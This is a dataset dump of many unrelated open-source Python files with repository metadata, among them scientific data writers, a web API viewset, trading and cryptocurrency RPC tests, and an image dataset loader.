rotenc1 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC1_ID, dut_output_widths=[32], dut_input_widths=[1])
rotenc2 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC2_ID, dut_output_widths=[32], dut_input_widths=[1])
buttons = XsDutIo(xsusb_id=USB_ID, module_id=BUTTONS_ID, dut_output_widths=[2], dut_input_widths=[1])
while True: # Do this forever...
accumulator1 = rotenc1.Read() # Read the ROT1 accumulator.
accumulator2 = rotenc2.Read() # Read the ROT2 accumulator.
bttns = buttons.Read() # Read the ROT1 and ROT2 buttons.
print 'ROT1: {:8x} {:1x} ROT2: {:8x} {:1x}\r'.format(accumulator1.unsigned, bttns[0], accumulator2.unsigned, bttns[1]),
|
[
"[email protected]"
] | |
2b44b6f0f3f0b9d259ad52416362ca4d246b0348
|
342fc6f60c688a21b9ba4a8e8b64438d77039ba2
|
/CNCS/CNCS/nxs/raw.py
|
c37c120916552715a26b08dd44b35ff7a2eded11
|
[] |
no_license
|
mcvine/instruments
|
854001fe35063b1c8c86e80495093ce72884771f
|
8e41d89c353995dcf5362a657a8bb5af08ff186c
|
refs/heads/master
| 2023-04-03T11:01:53.232939 | 2023-04-02T04:16:07 | 2023-04-02T04:16:07 | 120,621,268 | 1 | 0 | null | 2023-04-02T04:16:08 | 2018-02-07T13:51:36 |
Python
|
UTF-8
|
Python
| false | false | 3,916 |
py
|
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2008-2015 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
"""
This module helps creating "raw" CNCS nexus file.
"""
def write(events, tofbinsize, path):
""" write neutron events into a CNCS nexus file
The events is a numpy array of "event" records.
An event record has three fields:
* pixelID
* tofChannelNo
* p
tofbinsize * tofChannelNo is the tof for the bin
path is the output path
"""
# implementation details
# -1. h5py is used for handling the file.
# 0. make a new file by first copying a template file to a new file, and then adding new data
# 1. events are splitted to banks and saved. for a bank, all events are in bank{i}_events
# 2. any bank must have at least one event. if there are no events, we must assign fake ones
import shutil, sys
shutil.copyfile(nxs_template, path)
import time; time.sleep(0.5) # bad bad
import h5py
f = h5py.File(path, 'a')
entry = f['entry']
# XXX: hack
etz_attrs = {
'units': np.string_('second'),
'offset': np.string_('2012-08-23T11:23:53.833508666-04:00'),
'offset_seconds': 714583433,
'offset_nanoseconds': 833508666,
}
for bank in range(nbanks):
# print bank
sys.stdout.write('.')
# bank events
pixelidstart = bank * pixelsperbank
pixelidend = pixelidstart + pixelsperbank
bevts = events[(events['pixelID']<pixelidend) * (events['pixelID']>=pixelidstart)]
if not bevts.size:
# fake events. mantid cannot handle empty events
bevts = events[0:1].copy()
evt = bevts[0]
evt['pixelID'] = pixelidstart
evt['tofChannelNo'] = 0
evt['p'] = 0
# bank events directory
be = entry['bank%s_events' % (bank+bank_id_offset)]
be['event_id'] = bevts['pixelID'] + pixel_id_offset
be['event_time_offset'] = np.array(bevts['tofChannelNo'], dtype='float32') * tofbinsize
be['event_time_offset'].attrs['units'] = np.string_('microsecond')
be['event_weight'] = np.array(bevts['p'], dtype='float32')
be['event_index'] = np.array([0, len(bevts)], dtype='uint64')
be['event_time_zero'] = np.array([0, 1./60], dtype='float64')
etz = be['event_time_zero']
# hack
etz_attrs['target'] = np.string_('/entry/instrument/bank%s/event_time_zero' % (bank+bank_id_offset))
for k,v in etz_attrs.items(): etz.attrs[k] = v
# XXX: should this be a float and the sum of all weights?
# XXX: michael reuter said this is not really used
be['total_counts'][0] = len(bevts)
# bank directory
b = entry['bank%s' % (bank+bank_id_offset)]
# XXX: should this be float array?
# XXX: michael reuter said this is not really used
# compute histogram
# h, edges = np.histogram(bevts['pixelID'], pixelsperbank, range=(pixelidstart-0.5, pixelidend-0.5)) # weights = ?
# h.shape = 8, 128
# b['data_x_y'][:] = np.array(h, dtype='uint32')
continue
# XXX: should it be a float?
# entry['total_counts'][0] = len(events)
#
f.close()
#
sys.stdout.write('\n')
return
bank_id_offset = 1
pixelsperbank = 8 * 128
pixel_id_offset = (bank_id_offset-1)*pixelsperbank
nbanks = 50
npixels = nbanks * pixelsperbank
import os
from mcvine import resources as res
nxs_template = os.path.join(
res.instrument('CNCS'), 'nxs',
'cncs-raw-events-template.nxs',
)
import numpy as np
# End of file
|
[
"[email protected]"
] | |
6e7957bb1f333a3da864d18a81ae420ab74e4ffa
|
f19c5436c7173835a3f1d064541ee742178e213a
|
/mah/Programmers/메뉴 리뉴얼.py
|
20b5a552218aadd52b2828f25d2f9f8a092c26d5
|
[] |
no_license
|
hongsungheejin/Algo-Study
|
f1c521d01147a6f74320dbc8efe3c1037e970e73
|
d6cb8a2cc6495ccfcfb3477330a3af95895fae32
|
refs/heads/main
| 2023-07-06T10:58:27.258128 | 2021-07-29T02:11:13 | 2021-07-29T02:11:13 | 379,269,918 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 914 |
py
|
from itertools import combinations
def solution(orders, course):
candi = {}
course = set(course)
for order in orders:
order = sorted(order)
for i in range(2, len(order)+1):
for combi in combinations(order, i):
combi = "".join(combi)
if combi in candi:
candi[combi] += 1
else:
candi[combi] = 1
answer = []
candis = {k:v for k, v in sorted(candi.items(), key=lambda x: (len(x[0]), x[1])) if v>=2}
for c in course:
tmp = {}
max_v = 0
for k, v in sorted(candis.items(), key=lambda x:x[0]):
if len(k) == c:
max_v = max(max_v, v)
if v in tmp: tmp[v].append(k)
else: tmp[v] = [k]
if max_v in tmp:
answer.extend(tmp[max_v])
return sorted(answer)
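# Illustrative usage sketch (added for clarity; the sample input below is an
# assumption chosen to exercise the function, not part of the original submission).
if __name__ == "__main__":
    sample_orders = ["ABCFG", "AC", "CDE", "ACDE", "BCFG", "ACDEH"]
    sample_course = [2, 3, 4]
    print(solution(sample_orders, sample_course))  # prints the selected course menus in sorted order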
|
[
"[email protected]"
] | |
f607cc5e2526bcc268de801f40a60c5f8d777c39
|
558ad954a7b150ce95a30e5b1b4d277ed8286d46
|
/0x04-python-more_data_structures/8-simple_delete.py
|
48e0c39dd411cfe4884cd6a191de83073610e039
|
[] |
no_license
|
Indifestus/holbertonschool-higher_level_programming
|
9cf41f53d164a6612ea982c28468d2a330212920
|
aaaa08577888828016557826f85a98893d8e9cca
|
refs/heads/master
| 2023-03-15T19:06:48.626734 | 2018-01-15T02:27:29 | 2018-01-15T02:27:29 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
#!/usr/bin/python3
def simple_delete(my_dict, key=""):
if my_dict is not None:
my_dict.pop(key, None)
return my_dict
|
[
"[email protected]"
] | |
77921aade12cd93cfbbbffb1e59a7444b7ad84c1
|
d0d088be9ba855fbc1798d55a0874faee192d8b5
|
/posthog/api/person.py
|
e1d035c0bd7b0f564145380d16c7e281ae576d71
|
[
"MIT"
] |
permissive
|
pplonski/posthog
|
bf62d1bfb36a007adb180faecd418a8d1337f904
|
9ae6854254085bbe10cc4f9c98820d9efed52424
|
refs/heads/master
| 2021-01-08T17:36:18.303885 | 2020-02-20T19:38:07 | 2020-02-20T19:38:07 | 242,096,368 | 2 | 0 |
MIT
| 2020-02-21T09:00:14 | 2020-02-21T09:00:14 | null |
UTF-8
|
Python
| false | false | 2,781 |
py
|
from posthog.models import Event, Team, Person, PersonDistinctId
from rest_framework import serializers, viewsets, response, request
from rest_framework.decorators import action
from django.db.models import Q, Prefetch, QuerySet, Subquery, OuterRef
from .event import EventSerializer
from typing import Union
from .base import CursorPagination
class PersonSerializer(serializers.HyperlinkedModelSerializer):
last_event = serializers.SerializerMethodField()
name = serializers.SerializerMethodField()
class Meta:
model = Person
fields = ['id', 'name', 'distinct_ids', 'properties', 'last_event', 'created_at']
def get_last_event(self, person: Person) -> Union[dict, None]:
if not self.context['request'].GET.get('include_last_event'):
return None
last_event = Event.objects.filter(team_id=person.team_id, distinct_id__in=person.distinct_ids).order_by('-timestamp').first()
if last_event:
return {'timestamp': last_event.timestamp}
else:
return None
def get_name(self, person: Person) -> str:
if person.properties.get('email'):
return person.properties['email']
if len(person.distinct_ids) > 0:
return person.distinct_ids[-1]
return person.pk
class PersonViewSet(viewsets.ModelViewSet):
queryset = Person.objects.all()
serializer_class = PersonSerializer
pagination_class = CursorPagination
def _filter_request(self, request: request.Request, queryset: QuerySet) -> QuerySet:
if request.GET.get('id'):
people = request.GET['id'].split(',')
queryset = queryset.filter(id__in=people)
if request.GET.get('search'):
parts = request.GET['search'].split(' ')
contains = []
for part in parts:
if ':' in part:
queryset = queryset.filter(properties__has_key=part.split(':')[1])
else:
contains.append(part)
queryset = queryset.filter(properties__icontains=' '.join(contains))
queryset = queryset.prefetch_related(Prefetch('persondistinctid_set', to_attr='distinct_ids_cache'))
return queryset
def get_queryset(self):
queryset = super().get_queryset()
team = self.request.user.team_set.get()
queryset = queryset.filter(team=team)
queryset = self._filter_request(self.request, queryset)
return queryset.order_by('-id')
@action(methods=['GET'], detail=False)
def by_distinct_id(self, request):
person = self.get_queryset().get(persondistinctid__distinct_id=str(request.GET['distinct_id']))
return response.Response(PersonSerializer(person, context={'request': request}).data)
|
[
"[email protected]"
] | |
67036aa7f5e73b06e2cc28232521344169dd679e
|
5006a6965c21e5b828300eedf907eb55ec5b8b27
|
/bnpy/callbacks/CBCalcHeldoutMetricsTopicModel.py
|
57f0d662cfa836d5634ada5bdb6b7f599e3c9e2c
|
[
"BSD-3-Clause"
] |
permissive
|
birlrobotics/bnpy
|
1804d0fed9c3db4c270f4cd6616b30323326f1ec
|
8f297d8f3e4a56088d7755134c329f63a550be9e
|
refs/heads/master
| 2021-07-09T14:36:31.203450 | 2018-02-09T07:16:41 | 2018-02-09T07:16:41 | 96,383,050 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,802 |
py
|
'''
CBCalcHeldoutMetricsTopicModel.py
Learning alg callback extension for fitting topic models on heldout data.
When applied, will perform heldout inference at every parameter-save checkpoint.
Usage
--------
Add the following keyword arg to any call to bnpy.run
--customFuncPath CBCalcHeldoutMetricsTopicModel.py
Example
-------
$ python -m bnpy.Run BarsK10V900 FiniteTopicModel Mult VB \
--K 10 --nLap 50 \
--saveEvery 10 \
--customFuncPath CBCalcHeldoutMetricsTopicModel
Notes
--------
Uses the custom-function interface for learning algorithms.
This interface means that the functions onAlgorithmComplete and onBatchComplete
defined here will be called at appropriate time in *every* learning algorithm.
See LearnAlg.py's eval_custom_function for details.
'''
from __future__ import print_function
import os
import numpy as np
import scipy.io
import InferHeldoutTopics
import HeldoutMetricsLogger
SavedLapSet = set()
def onAlgorithmComplete(**kwargs):
''' Runs at completion of the learning algorithm.
Keyword Args
    --------
All workspace variables passed along from learning alg.
'''
if kwargs['lapFrac'] not in SavedLapSet:
runHeldoutCallback(**kwargs)
def onBatchComplete(**kwargs):
    ''' Runs heldout evaluation whenever a parameter-saving checkpoint is reached.
Keyword Args
--------
All workspace variables passed along from learning alg.
'''
global SavedLapSet
if kwargs['isInitial']:
SavedLapSet = set()
HeldoutMetricsLogger.configure(
**kwargs['learnAlg'].BNPYRunKwArgs['OutputPrefs'])
if not kwargs['learnAlg'].isSaveParamsCheckpoint(kwargs['lapFrac'],
kwargs['iterid']):
return
if kwargs['lapFrac'] in SavedLapSet:
return
SavedLapSet.add(kwargs['lapFrac'])
runHeldoutCallback(**kwargs)
def runHeldoutCallback(**kwargs):
''' Run heldout metrics evaluation on test dataset.
Kwargs will contain all workspace vars passed from the learning alg.
Keyword Args
------------
hmodel : current HModel object
Data : current Data object
representing *entire* dataset (not just one chunk)
Returns
-------
None. MAP state sequences are saved to a MAT file.
Output
-------
MATfile format: Lap0020.000MAPStateSeqs.mat
'''
taskpath = kwargs['learnAlg'].savedir
for splitName in ['validation', 'test']:
elapsedTime = kwargs['learnAlg'].get_elapsed_time()
InferHeldoutTopics.evalTopicModelOnTestDataFromTaskpath(
dataSplitName=splitName,
taskpath=taskpath,
elapsedTime=elapsedTime,
queryLap=kwargs['lapFrac'],
printFunc=HeldoutMetricsLogger.pprint,
**kwargs)
|
[
"[email protected]"
] | |
6eda11f72415c2c9a36b7f5635e2560ef63bf01a
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/pg_1318+062/sdB_pg_1318+062_lc.py
|
ff49a4e872dad3cb97afe62d31f086a25e90d3e8
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 344 |
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[200.185083,5.983667], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_pg_1318+062/sdB_pg_1318+062_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
053950d8dee6b200c63e069154c6d9c6ba7b21af
|
02442f7d3bd75da1b5b1bf6b981cc227906a058c
|
/rocon/build/rocon_app_platform/rocon_app_manager/catkin_generated/pkg.develspace.context.pc.py
|
3de9876b63c7300094cd88e5c7d2b10e59c73d88
|
[] |
no_license
|
facaisdu/RaspRobot
|
b4ff7cee05c70ef849ea4ee946b1995432a376b7
|
e7dd2393cdabe60d08a202aa103f796ec5cd2158
|
refs/heads/master
| 2020-03-20T09:09:28.274814 | 2018-06-14T08:51:46 | 2018-06-14T08:51:46 | 137,329,761 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 393 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rocon_app_manager"
PROJECT_SPACE_DIR = "/home/sclab_robot/turtlebot_ws/rocon/devel"
PROJECT_VERSION = "0.8.0"
|
[
"[email protected]"
] | |
5c9f9ce0e28a0947dd8edbcea57820ca55c76184
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/KCB_YCHF/KCB_YCHF_MM/SHOffer/YCHF_KCBYCHF_SHBP_153.py
|
57c5b458804546c0a77bf642879eaa200c682c30
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,568 |
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test//xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test//service")
from ServiceConfig import *
from ARmainservice import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test//mysql")
from CaseParmInsertMysql import *
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test//utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
from env_restart import *
class YCHF_KCBYCHF_SHBP_153(xtp_test_case):
def setUp(self):
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YCHF_KCBYCHF_SHBP_153')
#clear_data_and_restart_all()
#Api.trade.Logout()
#Api.trade.Login()
pass
#
def test_YCHF_KCBYCHF_SHBP_153(self):
title = '重启上海报盘(沪A最优五档即成转限价:分笔成交_累积成交金额 >= 手续费 且手续费小于最小值)'
        # Define the expected values for the current test case
        # Expected status: initial, not filled, partially filled, fully filled, partial-cancel reported, partially cancelled, reported pending cancel, cancelled, rejected, cancel-rejected, internally cancelled
        # xtp_ID and cancel_xtpID default to 0 and do not need to be changed
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': queryOrderErrorMsg(0),
'是否生成报单': '是',
'是否是撤废': '否',
# '是否是新股申购': '',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
        # Define the order parameter information ------------------------------------------
        # Parameters: security code, market, security type, security status, trading status, side (B buy / S sell), expected status, Api
stkparm = QueryStkPriceQty('688011', '1', '4', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters fails, the test case fails
if stkparm['返回结果'] is False:
rs = {
'报单测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
print(stkparm['错误原因'])
self.assertEqual(rs['报单测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':5,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_LIMIT'],
'price': stkparm['涨停价'],
'quantity': 300,
'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['报单测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
            ## restore the available funds
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YW_KCB_BAK_000')
#oms_restart()
self.assertEqual(rs['报单测试结果'], True) # 211
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
34d788e9ab997f619139b8af4b45a786cee0aac0
|
ce27a376fa4f6a25008674d007c670a4a0b8bda7
|
/defects_thresholding.py
|
1c96261ba4ebe8222fcc90b839c16ced1c0d9cfa
|
[] |
no_license
|
jrr1984/defects_analysis
|
22139b7734478b6261cf9efeaae755a2c5c71c79
|
2e43b65f1b936516f4a4c8f7feb5d46468864957
|
refs/heads/master
| 2020-12-10T20:00:39.977833 | 2020-04-16T12:00:22 | 2020-04-16T12:00:22 | 233,694,615 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,701 |
py
|
from skimage.filters import threshold_yen,threshold_isodata
from skimage import io,measure,img_as_float,morphology
from skimage.measure import regionprops_table
from skimage.color import label2rgb
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from matplotlib_scalebar.scalebar import ScaleBar
import pandas as pd
import glob
import time
start_time = time.time()
pixels_to_microns = 0.586
proplist = ['equivalent_diameter','area']
path = "C:/Users/juanr/Documents/mediciones_ZEISS/TILING/NIR/norm/*.tif"
data= []
holes_data = []
i=0
for file in glob.glob(path):
img = io.imread(file)
img = img_as_float(img)
thresh = threshold_yen(img)
binary = img <= thresh
binary_var = img <= (thresh - 0.1*thresh)
masked_binary = ndimage.binary_fill_holes(binary)
masked_binary_var = ndimage.binary_fill_holes(binary_var)
hols = masked_binary.astype(int) - binary
hols_var = masked_binary_var.astype(int) - binary_var
lab = measure.label(hols,connectivity=2)
lab_var = measure.label(hols_var, connectivity=2)
cleaned_holes = morphology.remove_small_objects(lab, connectivity=2)
cleaned_holes_var = morphology.remove_small_objects(lab_var, connectivity=2)
label_image = measure.label(masked_binary,connectivity=2)
label_image_var = measure.label(masked_binary_var, connectivity=2)
label_final = morphology.remove_small_objects(label_image, min_size=15)
label_final_var = morphology.remove_small_objects(label_image_var, min_size=15)
if label_final.any()!=0 and label_final_var.any() !=0:
props = regionprops_table(label_final, intensity_image=img, properties=proplist)
props_var = regionprops_table(label_final_var, intensity_image=img, properties=proplist)
props_df = pd.DataFrame(props)
props_df_var = pd.DataFrame(props_var)
props_df['error_diameter'] = abs(round((props_df['equivalent_diameter'] - props_df_var['equivalent_diameter'])*pixels_to_microns))
props_df['error_area'] = abs(round((props_df['area'] - props_df_var['area']) * pixels_to_microns ** 2))
props_df['img'] = i
data.append(props_df)
print('defects_df')
print(props_df)
print('error')
print(props_df['error_diameter'])
if cleaned_holes.any()!= 0 and cleaned_holes_var.any() != 0:
props_holes = regionprops_table(cleaned_holes, intensity_image=img, properties=proplist)
props_holes_var = regionprops_table(cleaned_holes_var, intensity_image=img, properties=proplist)
holes_df = pd.DataFrame(props_holes)
holes_df_var = pd.DataFrame(props_holes_var)
holes_df['error_diameter'] = abs(round((holes_df['equivalent_diameter'] - holes_df_var['equivalent_diameter'])*pixels_to_microns))
holes_df['error_area'] = abs(round((holes_df['area'] - holes_df_var['area']) * pixels_to_microns**2))
holes_df['img'] = i
holes_data.append(holes_df)
print('holes_df')
print(holes_df)
print('error holes')
print(holes_df['error_diameter'])
print(file, i)
i += 1
df = pd.concat(data)
df['equivalent_diameter'] = round(df['equivalent_diameter'] * pixels_to_microns)
df['area'] = round(df['area'] * pixels_to_microns **2)
df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsNIR_df.pkl")
holes_df = pd.concat(holes_data)
holes_df['equivalent_diameter'] = round(holes_df['equivalent_diameter'] * pixels_to_microns)
holes_df['area'] = round(holes_df['area'] * pixels_to_microns **2)
holes_df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsholesNIR_df.pkl")
print("--- %s minutes ---" % ((time.time() - start_time)/60))
|
[
"[email protected]"
] | |
bb53fe452117f99a8d8f7b1e33f47e1ab79db0c2
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Cron_Philip/Assignments/flaskolympics/olympics3/server.py
|
3c8cc483f0488a3e80700542e08036210ca2f614
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967 | 2016-10-18T21:54:39 | 2016-10-18T21:54:39 | 173,706,702 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 322 |
py
|
from flask import Flask, render_template, session
app = Flask(__name__)
app.secret_key = 'ThisIsSecret'
@app.route('/')
def myfirstfunction():
if not 'title' in session:
session['title'] = 'hello world'
return render_template('index.html', name="Mike")
if __name__ == '__main__':
app.run(debug = True)
|
[
"[email protected]"
] | |
2bcd1788de6e9a593abedae6ed61b48c43c67654
|
06d6c9346331e392f6d8067eb9ee52d38ae5fab8
|
/carver/pe/setup.py
|
299b8bff264703b5031d4a1ddd6b11e7c4e69e92
|
[
"Apache-2.0"
] |
permissive
|
maydewd/stoq-plugins-public
|
5d5e824dda0c78acab4ff9aef72f567e6b85e555
|
8b2877b5091ae731437ef35a95d4debdbf0a19f3
|
refs/heads/master
| 2020-03-22T18:57:41.061748 | 2018-06-12T14:36:42 | 2018-06-12T14:36:42 | 140,494,475 | 0 | 0 |
Apache-2.0
| 2018-07-10T22:39:08 | 2018-07-10T22:39:08 | null |
UTF-8
|
Python
| false | false | 371 |
py
|
from setuptools import setup, find_packages
setup(
name="pe",
version="0.10",
author="Jeff Ito, Marcus LaFerrera (@mlaferrera)",
url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
license="Apache License 2.0",
description="Carve portable executable files from a data stream",
packages=find_packages(),
include_package_data=True,
)
|
[
"[email protected]"
] | |
ab523c3751accac0cb2820f8f76621d3ca5474ab
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_172/ch88_2020_05_06_12_07_01_120079.py
|
65c8bdbe203ac21abf9a6631e62483803e27d184
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 344 |
py
|
class Retangulo:
    def __init__(self, coord1, coord2):
        # coord1 and coord2 are expected to be Ponto instances (opposite corners),
        # assuming Ponto exposes x and y attributes as in the exercise statement
        self.coord1 = coord1
        self.coord2 = coord2
    def calcula_perimetro(self):
        base = self.coord2.x - self.coord1.x
        altura = self.coord2.y - self.coord1.y
        return 2*base + 2*altura
    def calcula_area(self):
        base = self.coord2.x - self.coord1.x
        altura = self.coord2.y - self.coord1.y
        return base*altura
|
[
"[email protected]"
] | |
998e74d73408d3c5bf3bf99ce5df17a7a52ee3f8
|
0a40a0d63c8fce17f4a686e69073a4b18657b160
|
/test/functional/rpc_bip38.py
|
b70349a25ed83fb3fc00d631b1bc8dcd9eb3f3e4
|
[
"MIT"
] |
permissive
|
MotoAcidic/Cerebellum
|
23f1b8bd4f2170c1ed930eafb3f2dfff07df1c24
|
6aec42007c5b59069048b27db5a8ea1a31ae4085
|
refs/heads/main
| 2023-05-13T06:31:23.481786 | 2021-06-09T15:28:28 | 2021-06-09T15:28:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,025 |
py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The CEREBELLUM developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import CerebellumTestFramework
from test_framework.util import assert_equal
class Bip38Test(CerebellumTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
password = 'test'
address = self.nodes[0].getnewaddress()
privkey = self.nodes[0].dumpprivkey(address)
self.log.info('encrypt address %s' % (address))
bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
self.log.info('decrypt bip38 key %s' % (bip38key))
assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
Bip38Test().main()
|
[
"[email protected]"
] | |
fe57a510beaf39e45c60b51b452a5c31026ab28d
|
3ecce3646d66033d214db3749be63e78d4f663e9
|
/Assignment 4/load_utils.py
|
9b4f3fc6a5fb3ab71f6dc4b5ce5cbba2fb817a22
|
[
"Apache-2.0"
] |
permissive
|
pradyumnakr/EIP-3.0
|
f36aaed042d65beef163b08dbb0de05139e3fee7
|
67bc5168b169406d7567f3d1d3b9b35fc7dd61af
|
refs/heads/master
| 2022-01-27T15:23:00.013031 | 2019-07-28T17:25:35 | 2019-07-28T17:25:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,699 |
py
|
import os
import numpy as np
from imageio import imread  # assumed image reader; the original assignment may use scipy's imread instead
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
# First load wnids
with open(os.path.join(path, 'wnids.txt'), 'r') as f:
wnids = [x.strip() for x in f]
# Map wnids to integer labels
wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
# Use words.txt to get names for each class
with open(os.path.join(path, 'words.txt'), 'r') as f:
wnid_to_words = dict(line.split('\t') for line in f)
for wnid, words in wnid_to_words.items():
wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
class_names = [wnid_to_words[wnid] for wnid in wnids]
# Next load training data.
X_train = []
y_train = []
for i, wnid in enumerate(wnids):
if (i + 1) % 20 == 0:
print(f'loading training data for synset {(i + 1)}/{len(wnids)}')
# To figure out the filenames we need to open the boxes file
boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
with open(boxes_file, 'r') as f:
filenames = [x.split('\t')[0] for x in f]
num_images = len(filenames)
X_train_block = np.zeros((num_images, 64, 64, 3), dtype=dtype)
y_train_block = wnid_to_label[wnid] * np.ones(num_images, dtype=np.int64)
for j, img_file in enumerate(filenames):
img_file = os.path.join(path, 'train', wnid, 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
## grayscale file
img.shape = (64, 64, 1)
X_train_block[j] = img.transpose(1, 0, 2)
X_train.append(X_train_block)
y_train.append(y_train_block)
# We need to concatenate all training data
X_train = np.concatenate(X_train, axis=0)
y_train = np.concatenate(y_train, axis=0)
# Next load validation data
with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
img_files = []
val_wnids = []
for line in f:
img_file, wnid = line.split('\t')[:2]
img_files.append(img_file)
val_wnids.append(wnid)
num_val = len(img_files)
y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
X_val = np.zeros((num_val, 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'val', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_val[i] = img.transpose(1, 0, 2)
# Next load test images
# Students won't have test labels, so we need to iterate over files in the
# images directory.
img_files = os.listdir(os.path.join(path, 'test', 'images'))
X_test = np.zeros((len(img_files), 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'test', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_test[i] = img.transpose(1, 0, 2)
y_test = None
y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
if os.path.isfile(y_test_file):
with open(y_test_file, 'r') as f:
img_file_to_wnid = {}
for line in f:
line = line.split('\t')
img_file_to_wnid[line[0]] = line[1]
